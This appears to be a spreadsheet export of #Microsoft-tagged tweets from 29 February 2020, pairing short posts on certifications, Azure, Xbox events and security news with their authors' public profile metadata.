    <t>{'id': 36037128, 'id_str': '36037128', 'name': 'mRr3b00t @ Mi6', 'screen_name': 'UK_Daniel_Card', 'location': 'London, England', 'description': "Cyber Ninja Warrior @pwnDefend, wielder of someone else's scripts, can typo at over 140 words a minute! X10 Mi6 Agent - I'm deffo a SPY! Pro Story Teller", 'url': 'https://t.co/00QHce7CSx', 'entities': {'url': {'urls': [{'url': 'https://t.co/00QHce7CSx', 'expanded_url': 'https://www.pwndefend.com', 'display_url': 'pwndefend.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12052, 'friends_count': 4507, 'listed_count': 417, 'created_at': 'Tue Apr 28 10:49:27 +0000 2009', 'favourites_count': 156881, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 67855,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'http://pbs.twimg.com/profile_images/933407776025513984/Tq0FwtHm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933407776025513984/Tq0FwtHm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36037128/1473061637', 'profile_link_color': '000000',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</si>
  <si>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21:21:45 +0000 2020</t>
  </si>
  <si>
    <t>#AI #ethics backed by Pope and tech giants in new plan #IBM #Microsoft  https://t.co/J1PcPFDXkT</t>
  </si>
  <si>
    <t>{'id': 2743810270, 'id_str': '2743810270', 'name': 'Antony Faughnan', 'screen_name': 'antofaun_antony', 'location': '', 'description': 'Positive outlook, change and procurement leader: views expressed are personal. #inclusion, #sustainability, #democracy, #water, #technology, #collaboration', 'url': 'https://t.co/uv3Sze1oPs', 'entities': {'url': {'urls': [{'url': 'https://t.co/uv3Sze1oPs', 'expanded_url': 'http://www.ARCADIS.com', 'display_url': 'ARCADIS.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 500, 'friends_count': 474, 'listed_count': 93, 'created_at': 'Fri Aug 15 19:38:32 +0000 2014', 'favourites_count': 243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40194,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'http://pbs.twimg.com/profile_images/647841076775141376/oIuIEmWh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/647841076775141376/oIuIEmWh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2743810270/1443273759',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</si>
  <si>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21:18:10 +0000 2020</t>
  </si>
  <si>
    <t>And that's a wrap
Thanks for everyone who came out to see @Maggstor
Until next time. 
#Microsoft #mixer https://t.co/gBsoGSfBMa</t>
  </si>
  <si>
    <t>{'id': 1117577600048750592, 'id_str': '1117577600048750592', 'name': 'Epyon Gaming Management', 'screen_name': 'EpyonGaming', 'location': 'Charlotte, NC', 'description': 'Full-service esports and Gaming Talent Agency | Player and Company Representation, Networking, Development | Business: info@epyongm.com', 'url': 'https://t.co/KfvUK2dZAF', 'entities': {'url': {'urls': [{'url': 'https://t.co/KfvUK2dZAF', 'expanded_url': 'http://Epyongm.com', 'display_url': 'Epyongm.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 450, 'friends_count': 98, 'listed_count': 0, 'created_at': 'Sun Apr 14 23:57:18 +0000 2019', 'favourites_count': 3202, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 823,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'http://pbs.twimg.com/profile_images/1184117073397604352/B5RISpTE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184117073397604352/B5RISpTE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1117577600048750592/1571150485',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</si>
  <si>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21:15:34 +0000 2020</t>
  </si>
  <si>
    <t>mssqlproxy:-- #mssqlproxy is a #toolkit for lateral movement in restricted #environments through a #compromised #Microsoft #SQL #Server via #socket reuse. 
#Download #Link:- 
https://t.co/guAh30xlRV
#CyberSecurity #CyberOps #InformationTechnology #infosec #infosecurity #Hacking https://t.co/qzA0hUinVK</t>
  </si>
  <si>
    <t>{'id': 1173632505347338240, 'id_str': '1173632505347338240', 'name': 'National Cyber Security Services', 'screen_name': 'NationalCyberS1', 'location': '', 'description': 'We do provide Cyber Security and Android and iOS application development services to different reputed companies all over India.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 43, 'listed_count': 0, 'created_at': 'Mon Sep 16 16:20:27 +0000 2019', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227683668526686208/Ihv1xNt-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227683668526686208/Ihv1xNt-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1173632505347338240/1568656475',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</si>
  <si>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21:13:16 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft I'm locked out of my account I have the authenticator app I had to wipe my phone so now I don't have access to that. I try to do account recovery and I get this!?
#Microsoft #help #wtf https://t.co/anuER7fOuc</t>
  </si>
  <si>
    <t>Sat Feb 29 21:12:37 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Chrome and Firefox Extension Lets You View Deleted Web Pages:" https://t.co/UkfIzb2Ria
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Sat Feb 29 21:11:09 +0000 2020</t>
  </si>
  <si>
    <t>Hi. We have updates for your PC. Y si no las quiero!?  #Microsoft  #Windows</t>
  </si>
  <si>
    <t>{'id': 720711208387678209, 'id_str': '720711208387678209', 'name': 'geq', 'screen_name': 'gurugeq', 'location': 'Argentina', 'description': 'Amante de la ciencia, la tecnologÃ­a, los aviones (PPA) y la nueva carrera espacial. Programador, emprendedor e inversor de profesiÃ³n. Cero opinologÃ­a ðŸ‘Œ.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 203, 'listed_count': 0, 'created_at': 'Thu Apr 14 20:31:57 +0000 2016', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 353, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1221998303967170563/-34n9eJJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221998303967170563/-34n9eJJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/720711208387678209/1581502592',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</si>
  <si>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21:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Why I use #Microsoft Visual Studio Code to write #PowerShell.  
@code #VSCode 
https://t.co/i9fNy1I3lk</t>
  </si>
  <si>
    <t>Sat Feb 29 21:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Do you know about Activity Alerts in Office 365 to detect suspicious activity? 
https://t.co/ICa9q1cgGs
#O365 #Cybercrime #Ransomware #Protection #Security #Microsoft #Office365 @Microsoft https://t.co/kYAqYB2bAO</t>
  </si>
  <si>
    <t>Sat Feb 29 20:44:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft google and youtube and feedback and screenshot and audio and playback and edge and chrome and ad and server and service and loading bad so much and heavy and can't work and show correctly bad so much right now and slow down and bad response</t>
  </si>
  <si>
    <t>Sat Feb 29 20:42:39 +0000 2020</t>
  </si>
  <si>
    <t>Very good and important. #Microsoft #ActiveDirectory #AzureAD #Cloud #Office365 #Azure
Compare Active Directory to Azure Active Directory | Microsoft Docs https://t.co/suizxsUOxT</t>
  </si>
  <si>
    <t>{'id': 404317206, 'id_str': '404317206', 'name': 'Aleksander Weber', 'screen_name': 'AleksanderWeber', 'location': 'Germany', 'description': 'Microsoft Teams / Skype for Business and Azure Consultant, MCSE Cloud Platform and Infrastructure', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 140, 'listed_count': 39, 'created_at': 'Thu Nov 03 19:05:51 +0000 2011', 'favourites_count': 3707, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1871,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'http://pbs.twimg.com/profile_images/888476452236275712/QcphQPx7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/888476452236275712/QcphQPx7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/404317206/1434491695',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</si>
  <si>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20:30:16 +0000 2020</t>
  </si>
  <si>
    <t>Google Sheets: How to Create a Spreadsheet (Free Microsoft Excel) https://t.co/CH4czLnJlm via @YouTube #Google #GoogleSheets #Spreadsheet #Free #FreeExcel #Excel #Microsoft #MicrosoftExcel #Office #OfficeTools #Business</t>
  </si>
  <si>
    <t>Sat Feb 29 20:29:36 +0000 2020</t>
  </si>
  <si>
    <t>Glad that I never bothered to get an #MCSA, #MCSD, or #MCSE. #Microsoft destroyed value. #Retired</t>
  </si>
  <si>
    <t>{'id': 116298032, 'id_str': '116298032', 'name': 'Phil Crawford', 'screen_name': 'philjcrawford', 'location': 'Sydney', 'description': 'Married, Christian, Sys Admin,', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 162, 'listed_count': 2, 'created_at': 'Sun Feb 21 23:26:59 +0000 2010', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1078,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'http://pbs.twimg.com/profile_images/1197110023/IMG00165_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197110023/IMG00165_normal.jpg',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</si>
  <si>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20:28:17 +0000 2020</t>
  </si>
  <si>
    <t>Please cast your votes &amp;amp; don't spare your words! I want honest answers! #PS5 #Nintendo #XboxSeriesX #XboxOne #Sony #PS4Share #PC #Microsoft #NintendoSwitch</t>
  </si>
  <si>
    <t>{'id': 1220537757698797568, 'id_str': '1220537757698797568', 'name': 'BlackSageD', 'screen_name': 'BlackDGamer1', 'location': '', 'description': 'PSN:DonnyRay\nTwitch: https://t.co/TTw9ieCDJY\nNintendo FC: SW-3707-7511-7022\nSteam: donny_ray\nMixer: https://t.co/rKy1x2gmWb\nDiscord: https://t.co/cJ5P3lHybU', 'url': 'https://t.co/x2c9irnSai', 'entities': {'url': {'urls': [{'url': 'https://t.co/x2c9irnSai', 'expanded_url': 'https://www.youtube.com/channel/UCjPTfWAeLIrAhVZHzWLaSuw', 'display_url': 'youtube.com/channel/UCjPTfâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/TTw9ieCDJY', 'expanded_url': 'http://twitch.tv/blackdsage', 'display_url': 'twitch.tv/blackdsage', 'indices': [21, 44]}, {'url': 'https://t.co/rKy1x2gmWb', 'expanded_url': 'http://mixer.com/DarkDonnyRay92', 'display_url': 'mixer.com/DarkDonnyRay92', 'indices': [100, 123]}, {'url': 'https://t.co/cJ5P3lHybU', 'expanded_url': 'https://discord.gg/ay5HVFD', 'display_url': 'discord.gg/ay5HVFD', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 447, 'friends_count': 91, 'listed_count': 2, 'created_at': 'Fri Jan 24 02:50:11 +0000 2020', 'favourites_count': 7070, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7555, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225161714448113665/gcW1qu5b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225161714448113665/gcW1qu5b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1220537757698797568/1579908044',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</si>
  <si>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20:26:44 +0000 2020</t>
  </si>
  <si>
    <t>Norton LifeLock phishing scam infects victims with remote access trojan | TechRadar https://t.co/YCdTpiid7L ##technews #technology #security #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 20:25:27 +0000 2020</t>
  </si>
  <si>
    <t>Did you Know?
There is still time to jump into the MD-101 study group. Just sign up here to gain access to previous recordings and start learning with us! ---&amp;gt; https://t.co/dpej34AJY5
#WomenITPros #WITPro2020Challenge #MVPbuzz #Microsoft #Windows10 @compsolv https://t.co/crK7sNJTBI</t>
  </si>
  <si>
    <t>Sat Feb 29 20:15:09 +0000 2020</t>
  </si>
  <si>
    <t>An example of change leadership: Microsoft tackling sacred cows #Microsoft #ChangeManagement #ChangeStrategy #ChangeLeadership #LeadingChange #leadership #change #management #SacredCows #BusinessCulture #OrganizationalCulture #teambuilding #technology https://t.co/vT57KrxdcV</t>
  </si>
  <si>
    <t>Sat Feb 29 20:06:02 +0000 2020</t>
  </si>
  <si>
    <t>What is #AzureSphere Security Service?
https://t.co/4Lx8BCQiEM
#Azure #Microsoft #MicrosoftAzure #IoT #MicrosoftIoT #AS3 #Security #Cloud https://t.co/KU9lJA6Tma</t>
  </si>
  <si>
    <t>Sat Feb 29 20:04:39 +0000 2020</t>
  </si>
  <si>
    <t>Proprietary: #Apple 's 'Image' Obsession, #TurboTax Scam, #Nokia Demise and Microsoft Being #Microsoft https://t.co/Fqk9ScuXrm</t>
  </si>
  <si>
    <t>Sat Feb 29 20:04:02 +0000 2020</t>
  </si>
  <si>
    <t>As part of that shift, Microsoft is removing some of the older consumer-facing functionality like the ability to control music, manage a:   #microsoft #cortana https://t.co/FV1b1DMi0U di @AIGhostWriter https://t.co/pbVGgedepZ</t>
  </si>
  <si>
    <t>Sat Feb 29 20:01:03 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #Azure     VIA @azure     Microsoft Cloud Adoption Framework for Azure  https://t.co/UjMn0wcjbu</t>
  </si>
  <si>
    <t>Sat Feb 29 20:01:02 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #Azure #cloud      Did you know migrating to Microsoft Azure can reduce your data center footprint 73%? Check out this infographic for an overview and contact Archon Security to learn more! https://t.co/mRjcS2q8hC</t>
  </si>
  <si>
    <t>Sat Feb 29 20:00:19 +0000 2020</t>
  </si>
  <si>
    <t>KPMG announces new security offering for Microsoft Azure Sentinel to improve cyber defense capabilities for clients 
https://t.co/POPIah2gOk
#CyberCrime #KMPG #Microsoft #Azure #CyberSecurity #InfoSec #InformationTechnology #SecurityRisk #PrivacyThreat #CyberThreat #IoT https://t.co/e1T5Kykyh8</t>
  </si>
  <si>
    <t>Sat Feb 29 20:00:06 +0000 2020</t>
  </si>
  <si>
    <t>How To Create a New Customer in Microsoft Dynamics 365 Business Central
https://t.co/0z7DQ7oStU
#microsoft #customer #howto #training</t>
  </si>
  <si>
    <t>Sat Feb 29 19:51:10 +0000 2020</t>
  </si>
  <si>
    <t>Complete real world lessons at the #1 Trainer Presentation Skills Certification Course for trainers. Train-The-Trainer Certificates approved by #Microsoft - - Start Earning your potential  Enroll today - https://t.co/hHlcnus0xt https://t.co/Z2lnZPuF94</t>
  </si>
  <si>
    <t>Sat Feb 29 19:48:24 +0000 2020</t>
  </si>
  <si>
    <t>Beautiful, aint it? Someone should take a picture - Jorge052
.
 @tronsteezz
.
#airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersofinstagram #evafoam #fo... https://t.co/8OC0hyQ26v https://t.co/dbrN1kJOiO</t>
  </si>
  <si>
    <t>Sat Feb 29 19:46:50 +0000 2020</t>
  </si>
  <si>
    <t>Edna Conway 
https://t.co/lDg8433YBv 
@Edna_Conway @Microsoft #Microsoft #WomenInTech #RSAC @Cisco #Cisco https://t.co/czgayVNNEK</t>
  </si>
  <si>
    <t>{'id': 19747132, 'id_str': '19747132', 'name': 'Jeff Frick', 'screen_name': 'JeffFrick', 'location': 'Palo Alto, CA', 'description': 'Dad, Husband, Son, Brother, Friend. GM for @theCUBE, the Leading Interview format show covering Enterprise Tech &amp; Innovation. &amp; avid eVehicle enthusiast', 'url': 'https://t.co/FS8c6Kd3mW', 'entities': {'url': {'urls': [{'url': 'https://t.co/FS8c6Kd3mW', 'expanded_url': 'https://www.theCUBE.net', 'display_url': 'theCUBE.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5124, 'friends_count': 5619, 'listed_count': 1094, 'created_at': 'Fri Jan 30 01:18:33 +0000 2009', 'favourites_count': 42768, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 66343,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'http://pbs.twimg.com/profile_images/964273896735178752/RpRHPTpH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/964273896735178752/RpRHPTpH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19747132/1549213358',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</si>
  <si>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Sat Feb 29 19:46:29 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 19:45:25 +0000 2020</t>
  </si>
  <si>
    <t>ZDNet: #Microsoft is retiring its #MCSA, #MCSD and $MCSE certifications in June 2020.
https://t.co/xDF9RhZJWs</t>
  </si>
  <si>
    <t>{'id': 16063349, 'id_str': '16063349', 'name': 'James Chisholm', 'screen_name': 'geekpro', 'location': 'United States', 'description': 'Technical Specialist - Send â‚¿itcoin BTC: 17teKBN4GitX5fSbsJgSJyqjfxe7SVU4Rk', 'url': 'https://t.co/PYM5Bfuxb2', 'entities': {'url': {'urls': [{'url': 'https://t.co/PYM5Bfuxb2', 'expanded_url': 'http://JamesChisholm.com', 'display_url': 'JamesChisholm.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1463, 'friends_count': 3149, 'listed_count': 8, 'created_at': 'Sun Aug 31 04:32:00 +0000 2008', 'favourites_count': 702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4360, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '131516', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/497541373776515074/eXhKdGr__normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/497541373776515074/eXhKdGr__normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16063349/1549334142',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</si>
  <si>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Sat Feb 29 19:39:55 +0000 2020</t>
  </si>
  <si>
    <t>And the winner of our Madden 20 tournament is...Derreon Ray from @NS9Mustangs!!! It was a close match but he pulled off the victory with a 30-24 win in OT!!!!
#Microsoft
@Xbox 
@GalenaParkISD 
#Mustang_eSports
#eastsideesports
#Made4Greatness https://t.co/YjwWnibMuq</t>
  </si>
  <si>
    <t>{'id': 1019698435916812293, 'id_str': '1019698435916812293', 'name': 'North Shore 10th Grade Center', 'screen_name': 'NS10_Sophomores', 'location': '', 'description': '', 'url': 'https://t.co/McoOl1TYuh', 'entities': {'url': {'urls': [{'url': 'https://t.co/McoOl1TYuh', 'expanded_url': 'https://www.galenaparkisd.com/ns10', 'display_url': 'galenaparkisd.com/ns10', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 469, 'friends_count': 234, 'listed_count': 0, 'created_at': 'Wed Jul 18 21:40:27 +0000 2018', 'favourites_count': 1392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1174,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'http://pbs.twimg.com/profile_images/1159890940041080833/dgpQkpS-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159890940041080833/dgpQkpS-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1019698435916812293/1565374525', 'profile_link_color': 'FF0000',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</si>
  <si>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19:39:27 +0000 2020</t>
  </si>
  <si>
    <t>Configuration Manager Technical Preview 2002.2 is now available https://t.co/hN1Xg6EXrg #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 19:34:39 +0000 2020</t>
  </si>
  <si>
    <t>DXVK 1.5.5 Released
 https://t.co/exqzDCzeEN  They need to #deletegithub and not be prisoners of #microsoft
Also get a real site, #proprietarysoftware #github ain't it</t>
  </si>
  <si>
    <t>Sat Feb 29 19:34:30 +0000 2020</t>
  </si>
  <si>
    <t>NoSQL vs SQL: Demystifying #NoSQL Databases
 #database #Graph #Storage #Microsoft
https://t.co/eqsvZPZYiN</t>
  </si>
  <si>
    <t>Sat Feb 29 19:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Graph Explorer Method To Get And Remove Guest Users In #Office365 by @ktskumar cc @CsharpCorner https://t.co/foxfgsD2W4 #Windows10 https://t.co/brWgg4OWr7</t>
  </si>
  <si>
    <t>Sat Feb 29 19:28:57 +0000 2020</t>
  </si>
  <si>
    <t>A cost-effective, one-click backup solution, Azure Backup simplifies data recovery and is easier to enable than other cloud backup services. 
For more information visit us https://t.co/TfioIA05sx
#AzureSQLDatabas #backup #Azure #SAP  #Microsoft #Cloud #BCDR #HybridCloud #HybridCl https://t.co/iYRr1L41EJ</t>
  </si>
  <si>
    <t>Sat Feb 29 19:22:30 +0000 2020</t>
  </si>
  <si>
    <t>@don_barafranca You know #Apple and #Microsoft started in a Garage. Also great book for you to read called Discover the Full Potential of XRP and Ripple. #Ripple #XRP #XRPcommunity</t>
  </si>
  <si>
    <t>{'id': 166494543, 'id_str': '166494543', 'name': 'Jason Content â“‹ #XRP', 'screen_name': 'jasric89', 'location': '', 'description': 'Pastor @ @rayleighec lover of people, Jesus and #crypto been in the #crypto space since 2017. Holder of #XRP and #VeChain mainly. Here to help change the world.', 'url': 'https://t.co/bmK7z3eMx2', 'entities': {'url': {'urls': [{'url': 'https://t.co/bmK7z3eMx2', 'expanded_url': 'http://jasoncontent.wordpress.com', 'display_url': 'jasoncontent.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 222, 'friends_count': 164, 'listed_count': 7, 'created_at': 'Wed Jul 14 08:33:49 +0000 2010', 'favourites_count': 1841, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2370,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'http://pbs.twimg.com/profile_images/647555108692099072/ehBzT9Dd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/647555108692099072/ehBzT9Dd_normal.jpg', 'profile_link_color': '5D544D', 'profile_sidebar_border_color': 'E1DACA', 'profile_sidebar_fill_color': 'CFCCBB', 'profile_text_color': '291D21', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 19:19:00 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 19:18:59 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 19:17:47 +0000 2020</t>
  </si>
  <si>
    <t>5 things to try in Word online by @alicekeeler #Office365 #Microsoft  https://t.co/fzz9Qc3GTL</t>
  </si>
  <si>
    <t>{'id': 463463794, 'id_str': '463463794', 'name': 'Jason Weaver', 'screen_name': 'thejasonweaver', 'location': 'Texas, USA', 'description': 'Annual, major, planned &amp; blended gift planner. Related success with direct response &amp; database marketing. Planned giving marketing &amp; Raiserâ€™s Edge specialist.', 'url': 'https://t.co/NVOOLB5YxP', 'entities': {'url': {'urls': [{'url': 'https://t.co/NVOOLB5YxP', 'expanded_url': 'http://thejasonweaver.com', 'display_url': 'thejasonweaver.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1748, 'friends_count': 1766, 'listed_count': 164, 'created_at': 'Sat Jan 14 04:06:39 +0000 2012', 'favourites_count': 1930, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3411,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'http://pbs.twimg.com/profile_images/1102049607327145984/w7wf4deT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1102049607327145984/w7wf4deT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/463463794/1551758193',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</si>
  <si>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19:16:09 +0000 2020</t>
  </si>
  <si>
    <t>#IoTnews : #Quectel Collaborates with #Microsoft and #Qualcomm Technologies to Accelerate #InternetOfThings Solutions - #IoT @iotbusinessnews
 https://t.co/qAi9ZW6zmJ
#AI #innovation #5G #DigitalTransformation #FutureOfWork #Automation
cc @KirkDBorne @jblefevre60 @LouisSerge</t>
  </si>
  <si>
    <t>{'id': 202590356, 'id_str': '202590356', 'name': 'Harold Sinnott ðŸ“²', 'screen_name': 'HaroldSinnott', 'location': 'Miami, FL', 'description': 'Passionate about #EmergingTech #FutureOfWork #Automation #AI #RPA #Megatrends #Influencer #5G #BusinessIntelligence #B2B', 'url': 'https://t.co/y07ZXRNwLV', 'entities': {'url': {'urls': [{'url': 'https://t.co/y07ZXRNwLV', 'expanded_url': 'http://www.linkedin.com/in/haroldsinnott/', 'display_url': 'linkedin.com/in/haroldsinnoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64470, 'friends_count': 40754, 'listed_count': 2435, 'created_at': 'Thu Oct 14 11:38:43 +0000 2010', 'favourites_count': 183596, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 75921,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'http://pbs.twimg.com/profile_images/1214348334841901056/QSdqkzO-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214348334841901056/QSdqkzO-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/202590356/1583401152',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</si>
  <si>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Sat Feb 29 19:12:36 +0000 2020</t>
  </si>
  <si>
    <t>Mark the date! Because as of June 30, 2020 Microsoft retires its MCSA, MCSD and MCSE certification  and shifts to role-based certification.
#Microsoft #certification #retirement
https://t.co/SMoTuTwe3W</t>
  </si>
  <si>
    <t>{'id': 224185292, 'id_str': '224185292', 'name': 'Emil Cristen', 'screen_name': 'emilcristen', 'location': 'Enschede', 'description': 'CTO OV Software - Stijldansen Ballroom - IT Specialist - Web Developer - UI/UX designer - hardloper - blogger', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 496, 'listed_count': 3, 'created_at': 'Wed Dec 08 10:53:45 +0000 2010', 'favourites_count': 1471, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1085,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'http://pbs.twimg.com/profile_images/1112623578443321345/cnrv5QTa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1112623578443321345/cnrv5QTa_normal.jpg', 'profile_link_color': '005799',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</si>
  <si>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Sat Feb 29 19:11:56 +0000 2020</t>
  </si>
  <si>
    <t>Join ISG for an ITSource &amp;amp; SAM Atlanta Luncheon. Discover 2020 #sourcing trends, #softwaresourcing tactics, sourcing pitfalls to avoid and negotiation strategies that have been successful with #Microsoft, #Oracle, #Cisco and #SAP. #SoftwareAssetManagement https://t.co/IrfxY9cD5J</t>
  </si>
  <si>
    <t>{'id': 50083227, 'id_str': '50083227', 'name': 'Pavan Kunch', 'screen_name': 'pavankunch', 'location': 'Bengaluru', 'description': 'à²¨à³‹à²¡à²¿ à²¸à³à²µà²¾à²®à²¿ à²¨à²¾à²µà²¿à²°à³‹à²¦à³ à²¹à³€à²—à³†', 'url': 'http://t.co/RRbZtdV2kn', 'entities': {'url': {'urls': [{'url': 'http://t.co/RRbZtdV2kn', 'expanded_url': 'http://puddlesofsunshine.blogspot.com', 'display_url': 'puddlesofsunshine.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 439, 'friends_count': 651, 'listed_count': 2, 'created_at': 'Tue Jun 23 19:59:35 +0000 2009', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 539,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'http://pbs.twimg.com/profile_images/960815716038512640/X9KjYx7V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960815716038512640/X9KjYx7V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50083227/1425805642', 'profile_link_color': '19CF86',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</si>
  <si>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Sat Feb 29 19:09:19 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD and MCSE i.e. #Microsoft certification programs are being retired Jume 30th this year. 
I find this very dissatisfying as exams covering these certifications are really good ones and not only #Azure focused.
I am very interested in what will...https://t.co/RwFT1QlLOF</t>
  </si>
  <si>
